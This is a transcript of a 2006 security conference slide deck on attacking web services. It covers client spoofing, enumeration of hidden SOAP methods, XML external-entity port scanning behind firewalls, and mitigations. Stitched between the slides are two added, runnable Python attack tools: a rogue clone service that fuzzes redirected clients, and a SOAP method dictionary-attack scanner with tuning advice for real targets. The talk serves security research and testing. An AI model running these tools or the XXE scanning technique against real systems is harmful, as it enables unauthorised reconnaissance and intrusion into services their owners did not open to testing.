Teaching a New Dog Old Tricks - PowerPoint PPT Presentation

1
Teaching a New Dog Old Tricks
RUXCON 06
Web Services
Daniel Grzelak / Colin Wong
2
About Us
  • SIFT
  • Independent information security services
  • http://www.sift.com.au/
  • Daniel Grzelak
  • Technical analyst
  • daniel.grzelak@sift.com.au
  • Colin Wong
  • Found him outside
  • colin.wong@sift.com.au

3
Outline
  • Web services basics
  • The past, the present, the future
  • Client testing
  • Web method enumeration
  • XML port scanning
  • Structured testing framework

4
Web Services Essentials
  • XML-based remote procedure call
  • Simple Object Access Protocol (SOAP)
  • Web Services Description Language (WSDL)
  • Multiple transport bindings
  • HTTP, SMTP, FTP etc.
  • Interoperable, heterogeneous, magical!
  • Oh yeah, aight. Aight, I put on my robe and
    wizard hat.

5
Why Test Web Services?
  • High enterprise take-up in high value projects
  • Authentication services
  • Supply chain integration (B2B)
  • Exposing legacy systems
  • External APIs
  • Transactions and critical business functions
  • Web services will become increasingly widespread

6
New Dog, Old Tricks
  • Web services share vulnerabilities with
    traditional distributed technologies
  • Lots of the same attacks apply but with better
    structure (XML)
  • Web services platforms make it too easy
  • Code web services as a traditional object
  • Platform automagically turns it into a service
  • Minimal (if any) security

7
Client Testing
  • Web services security testing tends to focus on
    the web service itself
  • Clients are most often custom made
  • These can also be vulnerable
  • Clients are where the users are at
  • Users are the weakest link
  • Own the client and you can attack the users

8
Old Client Tricks
  • Similar to JavaScript attacks in web apps
  • Target the browser not the server
  • Large client/server software houses have learnt
    to look at the client
  • Internet Explorer
  • Real Player
  • Web services clients get overlooked

9
Client Attacks
  • Evil twin
  • DNS hacking
  • ARP poisoning
  • Hard to execute blind, possession of the client
    helps
  • Testing
  • Consume WSDL and become the web service
  • Once client talks to cloned web service, fuzz
    outputs and analyse client app response
  • Thorough logging must exist
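
The clone-the-service test from this slide, as an added example that is not part of the RUXCON deck: once the client has been redirected (evil twin, DNS, ARP), the clone serves the real WSDL so the client bootstraps normally, then answers every SOAP call with a mutated response and logs which case each client request received. The WSDL, the response template and the names in them (Account, GetToken, target.example) are constructed stand-ins; against a real target both are copied from the service the client expects to reach.

```python
"""Cloning a web service to test its client (slide 9). Added example, not from the
RUXCON deck. WSDL, response template and service names are constructed stand-ins;
in practice they are copied from the target service."""
import itertools
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from xml.sax.saxutils import escape

# Constructed stand-in for the WSDL fetched from the real service (hypothetical names).
WSDL = ('<?xml version="1.0"?>'
        '<definitions name="Account" targetNamespace="http://target.example/"'
        ' xmlns="http://schemas.xmlsoap.org/wsdl/"/>')

# Constructed stand-in for one captured good response; {value} is the field to mutate.
GOOD_RESPONSE = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<GetTokenResponse xmlns="http://target.example/"><GetTokenResult>{value}'
    '</GetTokenResult></GetTokenResponse></soap:Body></soap:Envelope>'
)


def fuzz_cases():
    """(label, response bytes) pairs aimed at the client's parsing, storage and display
    of server data. Well-formed cases carry hostile values; the last two break the XML
    itself to exercise the client's parser error path."""
    values = [
        ("long string", "A" * 70000),                     # length handling in native clients
        ("format specifiers", "%s%s%n%x"),                # value reaching printf-style logging
        ("html/script", "<script>alert(1)</script>"),     # value rendered in an HTML view
        ("negative number", "-1"),                        # sign and conversion errors
        ("bidi override", "\u202eevil"),                  # display spoofing of a shown string
        ("sql metacharacters", "'; DROP TABLE tokens; --"),  # value stored in a local DB
    ]
    for label, value in values:
        yield label, GOOD_RESPONSE.format(value=escape(value)).encode("utf-8")
    yield "unterminated xml", GOOD_RESPONSE.format(value="x")[:-20].encode("utf-8")
    yield "empty body", b""


def route(method, path, cases):
    """Pick the reply for one request: GET ...?wsdl returns the real WSDL, every POST
    (a SOAP call) gets the next fuzz case. Returns (status, content_type, body, label)."""
    if method == "GET" and path.lower().endswith("?wsdl"):
        return 200, "text/xml", WSDL.encode("utf-8"), "wsdl"
    if method == "POST":
        label, body = next(cases)
        return 200, "text/xml; charset=utf-8", body, label
    return 404, "text/plain", b"", "unhandled"


class CloneHandler(BaseHTTPRequestHandler):
    cases = itertools.cycle(list(fuzz_cases()))
    # (label, request excerpt): the logging slide 9 calls for, so a client crash or
    # odd behaviour can be matched to the response that caused it.
    log = []

    def _serve(self):
        length = int(self.headers.get("Content-Length", 0))
        request = self.rfile.read(length) if length else b""
        status, ctype, body, label = route(self.command, self.path, CloneHandler.cases)
        CloneHandler.log.append((label, request[:200]))
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = _serve
    do_POST = _serve


if __name__ == "__main__":
    # Bind on the address the client has been redirected to (assumed 0.0.0.0:80 here).
    ThreadingHTTPServer(("0.0.0.0", 80), CloneHandler).serve_forever()
```

The routing is kept separate from the HTTP handler so the case selection can be checked without sockets; `CloneHandler.log` is what you read back after the client misbehaves, since the interesting result is the client's reaction, not anything the clone returns.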

10
Web Method Enumeration
  • WSDL may not describe all allowed operations
  • Can be manually modified
  • Programmers love hidden backdoors
  • We would like to be able to find the secrets
  • Hidden administration interfaces or functions
  • Test or debug functions
  • Anything else we're not supposed to get to

11
Web Method Search
  • Perform a dictionary attack on web method names
    in a web service
  • Typically in the form of
  • GetToken
  • AuthenticateUser
  • SetPassword
  • CreateAccount
  • Create or use ready-made verb and noun lists

12
Calling Web Methods
  Minimal SOAP 1.1 request for webMethodName with a single argument element a:

  POST http://target.com/ HTTP/1.1
  SOAPAction: http://target.com/webMethodName
  Content-Type: text/xml

  <?xml version="1.0" encoding="utf-8"?>
  <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                 xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <soap:Body>
      <webMethodName xmlns="http://target.com/">
        <a></a>
      </webMethodName>
    </soap:Body>
  </soap:Envelope>

13
Analyse Responses
  • Test with each verb/noun combination
  • Analyse response of the web service
  • Can determine if the tested method exists
  • Combination exists
  • Successful call
  • Missing or incorrect parameter errors
  • Illegal argument or null reference errors
  • Combination does not exist
  • Operation not defined errors
  • No such operation or method
  • Bad SOAP action

14
Web Method Searching (For Bugs?)
  A full stack trace returned for a non-existent operation (Apache Axis under ColdFusion/JRun), disclosing the whole server stack:

  No such operation 'get'
    at org.apache.axis.providers.java.RPCProvider.processMessage(RPCProvider.java:179)
    at org.apache.axis.providers.java.JavaProvider.invoke(JavaProvider.java:323)
    at coldfusion.xml.rpc.CFCProvider.invoke(CFCProvider.java:54)
    at org.apache.axis.strategies.InvocationStrategy.visit(InvocationStrategy.java:32)
    at org.apache.axis.SimpleChain.doVisiting(SimpleChain.java:118)
    at org.apache.axis.SimpleChain.invoke(SimpleChain.java:83)
    at org.apache.axis.handlers.soap.SOAPService.invoke(SOAPService.java:453)
    at org.apache.axis.server.AxisServer.invoke(AxisServer.java:281)
    at org.apache.axis.transport.http.AxisServlet.doPost(AxisServlet.java:699)
    ...
    at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:78)
    at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:91)
    at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
    at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:257)
    at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:541)
    at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:204)
    at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:318)
    at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:426)

15
Web Method Searching (For Bugs?)
  Other output returned while probing method names, each leaking a framework, file paths, memory addresses or query structure:
  • DirectoryException cannot automatically create subdirectory http at
  • null not in database (yet)
  • /home/sites/site66/web/_webservices/includes/nusoap/nusoap.php on line 3778
  • Warning: Cannot modify header information - headers already sent by (output started at /home/sites/site66/web/_webservices/metasearch/index.php:96)
  • Access violation at address 05605B9C in module 'testckver.tss'. Read of address 0000000C
  • SQL syntax errors

16
Web Method Search Tool
  • Automated execution of dictionary attack with
    supplied wordlists
  • Analysis of responses against configurable
    response elements
  • A response may match more than one matcher
  • Supports multiple weightings
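
A working version of the dictionary attack from slides 11 to 16 (request construction, verb/noun product, weighted analysis of each reply), as an added example. It is not the SIFT tool; the endpoint, namespace, wordlists and pattern weights are assumptions to be tuned per target, and the transport is injectable so the scoring can be exercised without a live service.

```python
"""Web method dictionary attack against a SOAP endpoint (slides 11-16). Added
example, not the deck's tool. Endpoint URL, namespace, wordlists and pattern
weights are constructed here and would be tuned per target."""
import itertools
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

ENVELOPE = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"'
    ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
    ' xmlns:xsd="http://www.w3.org/2001/XMLSchema">'
    '<soap:Body><{method} xmlns="{ns}"/></soap:Body></soap:Envelope>'
)

# (substring of the response, weight). Positive: the call reached a real method and
# failed on its arguments (slide 13's "exists" signals). Negative: the dispatcher
# never found the method. Several patterns can match one reply; weights add up.
PATTERNS = [
    ("no such operation", -3),
    ("operation not defined", -3),
    ("bad soap action", -3),
    ("unrecognized soapaction", -3),   # wording varies by platform; extend per target
    ("missing parameter", 2),
    ("incorrect parameter", 2),
    ("illegalargument", 2),
    ("null reference", 2),
    ("nullreference", 2),
]


def build_request(method: str, ns: str) -> Tuple[Dict[str, str], bytes]:
    """Headers and body for one argument-less SOAP 1.1 call, as on slide 12."""
    headers = {"Content-Type": "text/xml; charset=utf-8",
               "SOAPAction": f'"{ns}{method}"'}
    return headers, ENVELOPE.format(method=method, ns=ns).encode("utf-8")


def score(status: int, body: str) -> int:
    """Sum the weights of every pattern present. A 2xx reply matching nothing is a
    successful call, the strongest 'exists' signal of all."""
    text = body.lower()
    total = sum(weight for needle, weight in PATTERNS if needle in text)
    if total == 0 and 200 <= status < 300:
        total = 3
    return total


def http_send(endpoint: str, headers: Dict[str, str], body: bytes,
              timeout: float = 10.0) -> Tuple[int, str]:
    """Real transport. SOAP faults come back as HTTP 500, so keep their body."""
    req = urllib.request.Request(endpoint, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as fault:
        return fault.code, fault.read().decode("utf-8", "replace")


def enumerate_methods(endpoint: str, ns: str, verbs: Iterable[str], nouns: Iterable[str],
                      send: Callable[..., Tuple[int, str]] = http_send) -> Dict[str, int]:
    """Try every Verb+Noun name; return {name: score} for names scoring above zero."""
    found = {}
    for verb, noun in itertools.product(verbs, nouns):
        name = verb + noun
        headers, body = build_request(name, ns)
        status, text = send(endpoint, headers, body)
        s = score(status, text)
        if s > 0:
            found[name] = s
    return found


if __name__ == "__main__":
    # Constructed wordlists; real runs use much larger verb and noun lists.
    hits = enumerate_methods("http://target.example/ws", "http://target.example/",
                             ["Get", "Authenticate", "Set", "Create"],
                             ["Token", "User", "Password", "Account"])
    for name, s in sorted(hits.items(), key=lambda kv: -kv[1]):
        print(f"{name}: {s}")
```

Calibrate PATTERNS first by calling one method you know exists and one you know does not, and read the two faults: platforms differ in wording, and a target that swallows faults into a generic error leaves only the status code and response size to score on.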

17
Web Method Search Tool
  • Demonstration
  • http://www.sift.com.au/73/0/tools.htm

18
Workarounds and Mitigating Strategies
  • Security through obscurity does not work
  • Do not rely on web methods staying secret, because they will not
  • Every method, documented or not, must sit behind the same authentication and authorisation checks as the published ones
  • Input validation on every parameter of every method

19
XML Port Scanning
  • Everyone loves XML
  • Has become the standard for information exchange
  • Ubiquitous support by all vendors and platforms
  • Firewalls block most traffic at the perimeter
  • Except maybe 80 and 443
  • Can we get behind the firewall to scan?
  • Maybe if we ask nicely

20
Traditional Port Scan
21
Document Type Definition
  • Allows you to define the valid elements of an XML
    document
  • Can dynamically build a DTD using references to
    external DTD definitions
  • Can define external entities that can be used
    within the XML document

22
XML Parser Abuse
  • Abuse the ability of XML parsers to dereference external sources
  • Use DTD entity declarations to get the parser to initiate connections on our behalf
  • Declare an external entity with the system identifier "http://192.168.1.1:22/" in the DTD and reference it from the document's <test> element: expanding it makes the parser attempt a connection to TCP port 22 on 192.168.1.1

23
Analyse Responses
  • We can infer the result of the attempted
    connection from the XML parser response
  • Closed ports result in a connection refused error
  • Open ports that respond to an HTTP request result in other errors or no error at all
  • Filtered ports, no such target, or open ports that do not respond to an HTTP request result in a timeout
  • Can only scan one port per XML document
  • Cycle through all target ports and systems

24
Applicability
  • This attack can be launched against XML endpoints
  • Cannot be used directly against SOAP
  • SOAP explicitly disallows DTD
  • Potential targets
  • AJAX APIs
  • XML document inputs
  • Encoded XML within SOAP parameters

25
Impacts
  • Port scanning of systems in your DMZ
  • Effectively transports the scanning to the parser
  • You can see whatever the XML parser can see
  • Firewalls won't help you
  • XML is valid traffic
  • SSL hides the attack traffic from network inspection

26
XML Port Scan
27
XML Port Scanning
  • Demonstration

28
Workarounds and Mitigating Strategies
  • Disable external entity elements
  • Or define allowed external elements
  • Prohibit DTDs
  • Exception handling that does not return error
    messages or details
  • Still allows timeouts to be detected
  • So some open ports can be detected
  • Closed ports return quickly

29
Structured Testing
  • Web services are popular
  • So is testing their security
  • However, no structured framework exists
  • i.e. no OWASP (although some OWASP projects touch
    on web services)
  • Security testing must be structured to be useful

30
Structured Testing Framework
  • Threat Modelling
  • Scoping
  • Test Planning
  • Test Execution
  • Reporting

31
Testing Categories
  • Information Gathering
  • Fuzzing
  • Injection
  • Confidentiality / Integrity
  • Logging
  • Logic Flaws
  • Authentication / Authorisation
  • Availability

32
Questions?
  • ?

33
Teaching a New Dog Old Tricks
RUXCON 06
Web Services
Colin Wong colin.wong@sift.com.au
Daniel Grzelak daniel.grzelak@sift.com.au